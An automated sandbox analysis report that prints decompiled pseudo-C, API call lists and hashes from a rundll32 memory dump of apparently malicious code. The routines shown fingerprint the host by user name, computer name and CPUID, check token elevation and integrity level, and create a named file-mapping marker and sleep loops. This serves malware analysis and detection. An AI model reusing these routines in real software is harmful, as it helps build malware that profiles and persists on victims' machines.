                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04354AC4,?,00000000,?,?), ref: 04359D23
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                          • String ID:
                                          • API String ID: 3521023985-0
                                          • Opcode ID: f1ab1651316ecff18b947bcb48acd0e7296893737c55919f60c49764ad63a72f
                                          • Instruction ID: 028459035e625ff14127218cbeab601134ac810b42a50ce12d4e2d8012e61984
                                          • Opcode Fuzzy Hash: f1ab1651316ecff18b947bcb48acd0e7296893737c55919f60c49764ad63a72f
                                          • Instruction Fuzzy Hash: C2514CB1409310AFD710AF15DC44E6BBBECEF89724F50AA19F8A592160D774E944CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E04351A4E(intOrPtr __edx, void** _a4, void** _a8) {
                                          				intOrPtr _v8;
                                          				struct _FILETIME* _v12;
                                          				short _v56;
                                          				struct _FILETIME* _t12;
                                          				intOrPtr _t13;
                                          				void* _t17;
                                          				void* _t21;
                                          				intOrPtr _t27;
                                          				long _t28;
                                          				void* _t30;
                                          
                                          				_t27 = __edx;
                                          				_t12 =  &_v12;
                                          				GetSystemTimeAsFileTime(_t12);
                                          				_push(0x192);
                                          				_push(0x54d38000);
                                          				_push(_v8);
                                          				_push(_v12);
                                          				L0435B082();
                                          				_push(_t12);
                                          				_v12 = _t12;
                                          				_t13 =  *0x435d2a4; // 0x251a5a8
                                          				_t5 = _t13 + 0x435e836; // 0x6878dde
                                          				_t6 = _t13 + 0x435e59c; // 0x530025
                                          				_push(0x16);
                                          				_push( &_v56);
                                          				_v8 = _t27;
                                          				L0435AD1A();
                                          				_t17 = CreateFileMappingW(0xffffffff, 0x435d2a8, 4, 0, 0x1000,  &_v56); // executed
                                          				_t30 = _t17;
                                          				if(_t30 == 0) {
                                          					_t28 = GetLastError();
                                          				} else {
                                          					if(GetLastError() == 0xb7) {
                                          						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                          						if(_t21 == 0) {
                                          							_t28 = GetLastError();
                                          							if(_t28 != 0) {
                                          								goto L6;
                                          							}
                                          						} else {
                                          							 *_a4 = _t30;
                                          							 *_a8 = _t21;
                                          							_t28 = 0;
                                          						}
                                          					} else {
                                          						_t28 = 2;
                                          						L6:
                                          						CloseHandle(_t30);
                                          					}
                                          				}
                                          				return _t28;
                                          			}














                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,04354996,?,?,4D283A53,?,?), ref: 04351A5A
                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04351A70
                                          • _snwprintf.NTDLL ref: 04351A95
                                          • CreateFileMappingW.KERNELBASE(000000FF,0435D2A8,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 04351AB1
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04354996,?,?,4D283A53,?), ref: 04351AC3
                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 04351ADA
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,04354996,?,?,4D283A53), ref: 04351AFB
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04354996,?,?,4D283A53,?), ref: 04351B03
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                          • String ID:
                                          • API String ID: 1814172918-0
                                          • Opcode ID: dd71c6c54a30ca871a4d65d946571372694578b6aba1bb4ca5c39ac78a569f4f
                                          • Instruction ID: 897e0cbdd1e03b0604bfa208942f5f92de4d8e5a9f3e8453e44c570913b3ac0c
                                          • Opcode Fuzzy Hash: dd71c6c54a30ca871a4d65d946571372694578b6aba1bb4ca5c39ac78a569f4f
                                          • Instruction Fuzzy Hash: 6921A176A00304BBDB21EB68DC45F9977BDEF48715F156121FA05E71A0E7B4EA04CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 139 43593d5-43593e9 140 43593f3-4359405 call 4356f89 139->140 141 43593eb-43593f0 139->141 144 4359407-4359417 GetUserNameW 140->144 145 4359459-4359466 140->145 141->140 146 4359468-435947f GetComputerNameW 144->146 147 4359419-4359429 RtlAllocateHeap 144->147 145->146 148 4359481-4359492 RtlAllocateHeap 146->148 149 43594bd-43594e1 146->149 147->146 150 435942b-4359438 GetUserNameW 147->150 148->149 151 4359494-435949d GetComputerNameW 148->151 152 4359448-4359457 HeapFree 150->152 153 435943a-4359446 call 4357cf7 150->153 154 435949f-43594ab call 4357cf7 151->154 155 43594ae-43594b7 HeapFree 151->155 152->146 153->152 154->155 155->149
                                          C-Code - Quality: 96%
                                          			E043593D5(char __eax, void* __esi) {
                                          				long _v8;
                                          				char _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v28;
                                          				long _t34;
                                          				signed int _t39;
                                          				long _t50;
                                          				char _t59;
                                          				intOrPtr _t61;
                                          				void* _t62;
                                          				void* _t64;
                                          				char _t65;
                                          				intOrPtr* _t67;
                                          				void* _t68;
                                          				void* _t69;
                                          
                                          				_t69 = __esi;
                                          				_t65 = __eax;
                                          				_v8 = 0;
                                          				_v12 = __eax;
                                          				if(__eax == 0) {
                                          					_t59 =  *0x435d270; // 0xd448b889
                                          					_v12 = _t59;
                                          				}
                                          				_t64 = _t69;
                                          				E04356F89( &_v12, _t64);
                                          				if(_t65 != 0) {
                                          					 *_t69 =  *_t69 ^  *0x435d2a0 ^ 0x76f6612d;
                                          				} else {
                                          					GetUserNameW(0,  &_v8); // executed
                                          					_t50 = _v8;
                                          					if(_t50 != 0) {
                                          						_t62 = RtlAllocateHeap( *0x435d238, 0, _t50 + _t50);
                                          						if(_t62 != 0) {
                                          							if(GetUserNameW(_t62,  &_v8) != 0) {
                                          								_t64 = _t62;
                                          								 *_t69 =  *_t69 ^ E04357CF7(_v8 + _v8, _t64);
                                          							}
                                          							HeapFree( *0x435d238, 0, _t62);
                                          						}
                                          					}
                                          				}
                                          				_t61 = __imp__;
                                          				_v8 = _v8 & 0x00000000;
                                          				GetComputerNameW(0,  &_v8);
                                          				_t34 = _v8;
                                          				if(_t34 != 0) {
                                          					_t68 = RtlAllocateHeap( *0x435d238, 0, _t34 + _t34);
                                          					if(_t68 != 0) {
                                          						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                          							_t64 = _t68;
                                          							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04357CF7(_v8 + _v8, _t64);
                                          						}
                                          						HeapFree( *0x435d238, 0, _t68);
                                          					}
                                          				}
                                          				asm("cpuid");
                                          				_t67 =  &_v28;
                                          				 *_t67 = 1;
                                          				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                          				 *((intOrPtr*)(_t67 + 8)) = 0;
                                          				 *(_t67 + 0xc) = _t64;
                                          				_t39 = _v16 ^ _v20 ^ _v28;
                                          				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                          				return _t39;
                                          			}




















                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 0435940C
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04359423
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04359430
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04359451
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04359478
                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0435948C
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04359499
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 043594B7
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: HeapName$AllocateComputerFreeUser
                                          • String ID:
                                          • API String ID: 3239747167-0
                                          • Opcode ID: 728f5ef3c48f3953c9b346fc1e74ff61458e5d144e9521aef42b41bacb87763c
                                          • Instruction ID: b0166584df58a65198f31a139af393eccd36528cd75496a9e11fc968b5e500fd
                                          • Opcode Fuzzy Hash: 728f5ef3c48f3953c9b346fc1e74ff61458e5d144e9521aef42b41bacb87763c
                                          • Instruction Fuzzy Hash: BB31D8B1A00205EFEB10DFA9D981B6EB7FDEF48304F61A469E905D7220D738EE419B51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 100%
                                          			E043553E3(long* _a4) {
                                          				long _v8;
                                          				void* _v12;
                                          				void _v16;
                                          				long _v20;
                                          				int _t33;
                                          				void* _t46;
                                          
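                                          				// Defaults returned when the check on *0x435d25c below is not taken:
                                          				// _v16 = 1, _v20 = 0x2000 (SECURITY_MANDATORY_MEDIUM_RID).
                                          				_v16 = 1;
                                          				_v20 = 0x2000;
                                          				if( *0x435d25c > 5) {
                                          					_v16 = 0;
                                          					// 0xffffffff = current-process pseudo-handle; 0x20008 = READ_CONTROL | TOKEN_QUERY.
                                          					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                          						// 0x14 = TokenElevation: writes the 4-byte TokenIsElevated flag into _v16.
                                          						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                          						_v8 = 0;
                                          						// 0x19 = TokenIntegrityLevel: NULL buffer, so this call only returns the required size in _v8.
                                          						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                          						if(_v8 != 0) {
                                          							_t46 = E043558BE(_v8);
                                          							if(_t46 != 0) {
                                          								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                          								if(_t33 != 0) {
                                          									// The last sub-authority of the label SID is the integrity-level RID.
                                          									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));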
                                          								}
                                          								E0435147E(_t46);
                                          							}
                                          						}
                                          						CloseHandle(_v12);
                                          					}
                                          				}
                                          				 *_a4 = _v20;
                                          				return _v16;
                                          			}










                                          APIs
                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04355415
                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenElevation),00000001,00000004,?,00000000), ref: 04355435
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04355445
                                          • CloseHandle.KERNEL32(00000000), ref: 04355495
                                            • Part of subcall function 043558BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04351C51), ref: 043558CA
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04355468
                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04355470
                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04355480
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                          • String ID:
                                          • API String ID: 1295030180-0
                                          • Opcode ID: d5484682e1dc7fb7d8afc75834f394cb5ca7e0f1f03a440d3b60757bb374c66a
                                          • Instruction ID: 61be69ee96ae21b562ddd9318ad55c864e9d8f7f37e6af1ff7b3437bedd923e9
                                          • Opcode Fuzzy Hash: d5484682e1dc7fb7d8afc75834f394cb5ca7e0f1f03a440d3b60757bb374c66a
                                          • Instruction Fuzzy Hash: C12139B5900218FFEB009FA4DC44EAEBBBDEB48314F1090A5E910A7261C775AE45EB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 186 435a060-435a0a6 SysAllocString 187 435a0ac-435a0d9 186->187 188 435a1ca-435a1ce 186->188 194 435a0df-435a0eb call 435a872 187->194 195 435a1c8 187->195 189 435a1d0-435a1d3 SafeArrayDestroy 188->189 190 435a1d9-435a1dd 188->190 189->190 192 435a1df-435a1e2 SysFreeString 190->192 193 435a1e8-435a1ee 190->193 192->193 194->195 198 435a0f1-435a101 194->198 195->188 198->195 200 435a107-435a12d IUnknown_QueryInterface_Proxy 198->200 200->195 202 435a133-435a147 200->202 204 435a186-435a18b 202->204 205 435a149-435a14d 202->205 206 435a18d-435a192 204->206 207 435a1bf-435a1c4 204->207 205->204 208 435a14f-435a166 StrStrIW 205->208 206->207 209 435a194-435a19f call 4351295 206->209 207->195 210 435a17d-435a180 SysFreeString 208->210 211 435a168-435a171 call 43591b5 208->211 215 435a1a4-435a1a8 209->215 210->204 211->210 216 435a173-435a17b call 435a872 211->216 215->207 217 435a1aa-435a1af 215->217 216->210 219 435a1b1-435a1b8 217->219 220 435a1ba 217->220 219->207 220->207
                                          APIs
                                          • SysAllocString.OLEAUT32(?), ref: 0435A09B
                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 0435A11E
                                          • StrStrIW.SHLWAPI(00000000,006E0069), ref: 0435A15E
                                          • SysFreeString.OLEAUT32(00000000), ref: 0435A180
                                            • Part of subcall function 043591B5: SysAllocString.OLEAUT32(0435C298), ref: 04359205
                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 0435A1D3
                                          • SysFreeString.OLEAUT32(00000000), ref: 0435A1E2
                                            • Part of subcall function 0435A872: Sleep.KERNEL32(000001F4), ref: 0435A8BA
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                          • String ID:
                                          • API String ID: 2118684380-0
                                          • Opcode ID: 9012a92d246f5f8ceeb136a4b8ccfb22dc1d3ab820c35c3db7298337d46b6626
                                          • Instruction ID: 5c6288b18769bf4f082378c3db31b393688a623e38eeb923f39d54a4fe3925db
                                          • Opcode Fuzzy Hash: 9012a92d246f5f8ceeb136a4b8ccfb22dc1d3ab820c35c3db7298337d46b6626
                                          • Instruction Fuzzy Hash: 5D518535500609EFDB01EFA8D844EAEB7BAFF88740F149529E915DB220EB35EE05DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 222 4357c75-4357c88 223 4357c8f-4357c93 StrChrA 222->223 224 4357c95-4357ca6 call 43558be 223->224 225 4357c8a-4357c8e 223->225 228 4357ca8-4357cb4 StrTrimA 224->228 229 4357ceb 224->229 225->223 230 4357cb6-4357cbf StrChrA 228->230 231 4357ced-4357cf4 229->231 232 4357cd1-4357cdd 230->232 233 4357cc1-4357ccb StrTrimA 230->233 232->230 234 4357cdf-4357ce9 232->234 233->232 234->231
                                          C-Code - Quality: 54%
                                          			E04357C75(char* __eax) {
                                          				char* _t8;
                                          				intOrPtr _t12;
                                          				char* _t21;
                                          				signed int _t23;
                                          				char* _t24;
                                          				signed int _t26;
                                          				void* _t27;
                                          
                                          				_t21 = __eax;
                                          				_push(0x20);
                                          				_t23 = 1;
                                          				_push(__eax);
                                          				while(1) {
                                          					_t8 = StrChrA();
                                          					if(_t8 == 0) {
                                          						break;
                                          					}
                                          					_t23 = _t23 + 1;
                                          					_push(0x20);
                                          					_push( &(_t8[1]));
                                          				}
                                          				_t12 = E043558BE(_t23 << 2);
                                          				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                          				if(_t12 != 0) {
                                          					StrTrimA(_t21, 0x435c28c); // executed
                                          					_t26 = 0;
                                          					do {
                                          						_t24 = StrChrA(_t21, 0x20);
                                          						if(_t24 != 0) {
                                          							 *_t24 = 0;
                                          							_t24 =  &(_t24[1]);
                                          							StrTrimA(_t24, 0x435c28c);
                                          						}
                                          						_t2 = _t27 + 0x10; // 0x4d283a53
                                          						 *( *_t2 + _t26 * 4) = _t21;
                                          						_t26 = _t26 + 1;
                                          						_t21 = _t24;
                                          					} while (_t24 != 0);
                                          					_t6 = _t27 + 0x10; // 0x4d283a53
                                          					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *_t6;
                                          				}
                                          				return 0;
                                          			}











                                          APIs
                                          • StrChrA.SHLWAPI(?,00000020,00000000,068795AC,?,?,?,04354C85,068795AC,?,?,?,04354A8B,?,?,?), ref: 04357C8F
                                          • StrTrimA.KERNELBASE(?,0435C28C,00000002,?,?,?,04354C85,068795AC,?,?,?,04354A8B,?,?,?,4D283A53), ref: 04357CAE
                                          • StrChrA.SHLWAPI(?,00000020,?,?,?,04354C85,068795AC,?,?,?,04354A8B,?,?,?,4D283A53,?), ref: 04357CB9
                                          • StrTrimA.SHLWAPI(00000001,0435C28C,?,?,?,04354C85,068795AC,?,?,?,04354A8B,?,?,?,4D283A53,?), ref: 04357CCB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: Trim
                                          • String ID: S:(M
                                          • API String ID: 3043112668-2217774225
                                          • Opcode ID: c00bd33c81677d49996970574b82a4e86741158623360d121693d961a34bd57d
                                          • Instruction ID: 2c80a7857754a8dc937a5dc016c3bfd9f9d2ed8f60af9030891ff5970bab6a84
                                          • Opcode Fuzzy Hash: c00bd33c81677d49996970574b82a4e86741158623360d121693d961a34bd57d
                                          • Instruction Fuzzy Hash: 6D01B5716053216BD2219E659C48E3BBFACFB45A60F116519FC51C7350DB60E80186F0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 235 43590a1-43590b7 HeapCreate 236 43590be-43590d4 GetTickCount call 4356a7f 235->236 237 43590b9-43590bc 235->237 238 435911c 236->238 241 43590d6-43590d7 236->241 237->238 242 43590d8-4359100 SwitchToThread call 4351c04 Sleep 241->242 245 4359102-435910b call 4359511 242->245 248 4359117 call 4354908 245->248 249 435910d 245->249 248->238 249->248
                                          C-Code - Quality: 100%
                                          			E043590A1(void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                          				void* _t5;
                                          				void* _t7;
                                          				void* _t10;
                                          				void* _t13;
                                          				void* _t14;
                                          				void* _t15;
                                          				void* _t16;
                                          				signed int _t22;
                                          
                                          				_t16 = __edx;
                                          				_t5 = HeapCreate(0, 0x400000, 0); // executed
                                          				 *0x435d238 = _t5;
                                          				if(_t5 == 0) {
                                          					_t14 = 8;
                                          					return _t14;
                                          				}
                                          				 *0x435d1a8 = GetTickCount();
                                          				_t7 = E04356A7F(_a4);
                                          				if(_t7 == 0) {
                                          					do {
                                          						_t22 = SwitchToThread() + 8;
                                          						_t10 = E04351C04(_a4, _t22);
                                          						Sleep(0x20 + _t22 * 4); // executed
                                          					} while (_t10 == 1);
                                          					if(E04359511(_t15) != 0) {
                                          						 *0x435d260 = 1; // executed
                                          					}
                                          					_t13 = E04354908(_t16); // executed
                                          					return _t13;
                                          				}
                                          				return _t7;
                                          			}












                                          APIs
                                          • HeapCreate.KERNEL32(00000000,00400000,00000000,04356F11,?), ref: 043590AA
                                          • GetTickCount.KERNEL32 ref: 043590BE
                                          • SwitchToThread.KERNEL32(?,00000001,?), ref: 043590D8
                                          • Sleep.KERNEL32(00000000,-00000008,?,00000001,?), ref: 043590F7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: CountCreateHeapSleepSwitchThreadTick
                                          • String ID: *1a
                                          • API String ID: 377297877-913525848
                                          • Opcode ID: 0c7344ddcbdf01d9173b59c872a0225c3f3f7423fcb99f834f6ad3d38eccc047
                                          • Instruction ID: 407a34c0e46734a78b44994804cd6113087dd0654693d743cdf92ea088560e5b
                                          • Opcode Fuzzy Hash: 0c7344ddcbdf01d9173b59c872a0225c3f3f7423fcb99f834f6ad3d38eccc047
                                          • Instruction Fuzzy Hash: 69F068B1600310EAE7107B74EC49F6E36ACEF48759F007421EC05D7150EB38E941D661
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 251 4354908-4354922 call 43511af 254 4354924-4354932 251->254 255 4354938-4354946 251->255 254->255 257 4354958-4354973 call 4351111 255->257 258 4354948-435494b 255->258 264 4354975-435497b 257->264 265 435497d 257->265 258->257 259 435494d-4354952 258->259 259->257 261 4354adb 259->261 263 4354add-4354ae2 261->263 266 4354983-4354998 call 4351ec4 call 4351a4e 264->266 265->266 271 43549a3-43549a9 266->271 272 435499a-435499d CloseHandle 266->272 273 43549cf-43549e7 call 43558be 271->273 274 43549ab-43549b0 271->274 272->271 283 4354a13-4354a15 273->283 284 43549e9-4354a11 memset RtlInitializeCriticalSection 273->284 275 4354ac6-4354acb 274->275 276 43549b6 274->276 278 4354ad3-4354ad9 275->278 279 4354acd-4354ad1 275->279 280 43549b9-43549c8 call 4357827 276->280 278->263 279->263 279->278 289 43549ca 280->289 287 4354a16-4354a1a 283->287 284->287 287->275 288 4354a20-4354a36 RtlAllocateHeap 287->288 290 4354a66-4354a68 288->290 291 4354a38-4354a64 wsprintfA 288->291 289->275 292 4354a69-4354a6d 290->292 291->292 292->275 293 4354a6f-4354a8f call 43593d5 call 43598f7 292->293 293->275 298 4354a91-4354a98 call 435205b 293->298 301 4354a9f-4354aa6 298->301 302 4354a9a-4354a9d 298->302 303 4354aa8-4354aaa 301->303 304 4354abb-4354abf call 4359b6f 301->304 302->275 303->275 306 4354aac-4354ab0 call 4356cd3 303->306 308 4354ac4 304->308 309 4354ab5-4354ab9 306->309 308->275 309->275 309->304
                                          C-Code - Quality: 57%
                                          			E04354908(signed int __edx) {
                                          				signed int _v8;
                                          				long _v12;
                                          				CHAR* _v16;
                                          				long _v20;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t21;
                                          				CHAR* _t22;
                                          				CHAR* _t25;
                                          				intOrPtr _t26;
                                          				void* _t27;
                                          				void* _t31;
                                          				void* _t32;
                                          				CHAR* _t36;
                                          				CHAR* _t42;
                                          				CHAR* _t43;
                                          				CHAR* _t44;
                                          				CHAR* _t46;
                                          				void* _t49;
                                          				void* _t51;
                                          				signed char _t56;
                                          				intOrPtr _t58;
                                          				signed int _t59;
                                          				void* _t63;
                                          				CHAR* _t67;
                                          				CHAR* _t68;
                                          				char* _t69;
                                          				void* _t70;
                                          
                                          				_t61 = __edx;
                                          				_v20 = 0;
                                          				_v8 = 0;
                                          				_v12 = 0;
                                          				_t21 = E043511AF();
                                          				if(_t21 != 0) {
                                          					_t59 =  *0x435d25c; // 0x4000000a
                                          					_t55 = (_t59 & 0xf0000000) + _t21;
                                          					 *0x435d25c = (_t59 & 0xf0000000) + _t21;
                                          				}
                                          				_t22 =  *0x435d164(0, 2);
                                          				_v16 = _t22;
                                          				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                          					_t25 = E04351111( &_v8,  &_v20); // executed
                                          					_t54 = _t25;
                                          					_t26 =  *0x435d2a4; // 0x251a5a8
                                          					if( *0x435d25c > 5) {
                                          						_t8 = _t26 + 0x435e5cd; // 0x4d283a53
                                          						_t27 = _t8;
                                          					} else {
                                          						_t7 = _t26 + 0x435ea05; // 0x44283a44
                                          						_t27 = _t7;
                                          					}
                                          					E04351EC4(_t27, _t27);
                                          					_t31 = E04351A4E(_t61,  &_v20,  &_v12); // executed
                                          					if(_t31 == 0) {
                                          						CloseHandle(_v20);
                                          					}
                                          					_t63 = 5;
                                          					if(_t54 != _t63) {
                                          						 *0x435d270 =  *0x435d270 ^ 0x81bbe65d;
                                          						_t32 = E043558BE(0x60);
                                          						 *0x435d324 = _t32;
                                          						__eflags = _t32;
                                          						if(_t32 == 0) {
                                          							_push(8);
                                          							_pop(0);
                                          						} else {
                                          							memset(_t32, 0, 0x60);
                                          							_t49 =  *0x435d324; // 0x68795b0
                                          							_t70 = _t70 + 0xc;
                                          							__imp__(_t49 + 0x40);
                                          							_t51 =  *0x435d324; // 0x68795b0
                                          							 *_t51 = 0x435e845;
                                          						}
                                          						_t54 = 0;
                                          						__eflags = 0;
                                          						if(0 == 0) {
                                          							_t36 = RtlAllocateHeap( *0x435d238, 0, 0x43);
                                          							 *0x435d2c4 = _t36;
                                          							__eflags = _t36;
                                          							if(_t36 == 0) {
                                          								_push(8);
                                          								_pop(0);
                                          							} else {
                                          								_t56 =  *0x435d25c; // 0x4000000a
                                          								_t61 = _t56 & 0x000000ff;
                                          								_t58 =  *0x435d2a4; // 0x251a5a8
                                          								_t13 = _t58 + 0x435e55a; // 0x697a6f4d
                                          								_t55 = _t13;
                                          								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x435c28f);
                                          							}
                                          							_t54 = 0;
                                          							__eflags = 0;
                                          							if(0 == 0) {
                                          								asm("sbb eax, eax");
                                          								E043593D5( ~_v8 &  *0x435d270, 0x435d00c); // executed
                                          								_t42 = E043598F7(0, _t55, _t63, 0x435d00c); // executed
                                          								_t54 = _t42;
                                          								__eflags = _t54;
                                          								if(_t54 != 0) {
                                          									goto L30;
                                          								}
                                          								_t43 = E0435205B(_t55); // executed
                                          								__eflags = _t43;
                                          								if(_t43 != 0) {
                                          									__eflags = _v8;
                                          									_t67 = _v12;
                                          									if(_v8 != 0) {
                                          										L29:
                                          										_t44 = E04359B6F(_t61, _t67, _v8); // executed
                                          										_t54 = _t44;
                                          										goto L30;
                                          									}
                                          									__eflags = _t67;
                                          									if(__eflags == 0) {
                                          										goto L30;
                                          									}
                                          									_t46 = E04356CD3(__eflags,  &(_t67[4])); // executed
                                          									_t54 = _t46;
                                          									__eflags = _t54;
                                          									if(_t54 == 0) {
                                          										goto L30;
                                          									}
                                          									goto L29;
                                          								}
                                          								_t54 = 8;
                                          							}
                                          						}
                                          					} else {
                                          						_t68 = _v12;
                                          						if(_t68 == 0) {
                                          							L30:
                                          							if(_v16 == 0 || _v16 == 1) {
                                          								 *0x435d160();
                                          							}
                                          							goto L34;
                                          						}
                                          						_t69 =  &(_t68[4]);
                                          						do {
                                          						} while (E04357827(_t63, _t69, 0, 1) == 0x4c7);
                                          					}
